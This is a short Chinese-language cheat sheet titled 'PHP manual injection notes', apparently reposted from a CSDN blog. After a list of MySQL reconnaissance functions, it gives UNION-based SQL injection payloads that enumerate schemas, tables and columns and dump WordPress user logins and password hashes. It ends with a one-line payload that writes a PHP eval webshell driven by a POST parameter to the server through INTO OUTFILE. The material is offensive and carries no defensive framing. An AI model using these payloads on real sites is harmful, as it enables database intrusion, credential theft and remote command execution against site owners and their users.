php手工注入笔记

PHP内置函数:
1:system_user() 系统用户名
2:user()        用户名
3:current_user  当前用户名
4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
8:@@datadir     读取数据库路径
9:@@basedir    MYSQL 安装路径
10:@@version_compile_os   操作系统  
===========================================================================
爆信息:
and 1=2 union select group_concat(user(),0x7c,database(),0x7c,version())--
============================================================================
1,爆库
 and 1=2 union select group_concat(SCHEMA_NAME) from 
 information_schema.SCHEMATA --


2,爆表
 and 1=2 union select group_concat(TABLE_NAME) from 
 information_schema.TABLES where TABLE_SCHEMA=0x776f72647072657373--

3,爆字段
 and 1=2 union select group_concat(COLUMN_NAME) from 
 information_schema.COLUMNS where TABLE_name=0x77705f7573657273--

4,爆密码
and 1=2 union select group_concat(user_login,0x7c,user_pass) from wordpress.wp_users--

=============================================================================
load_file()

select ‘<?php eval_r($_POST[cmd])?>' into outfile '物理路径'

原文链接: http://blog.csdn.net/mypc2010/article/details/7773413

你可能感兴趣的:(php手工注入笔记)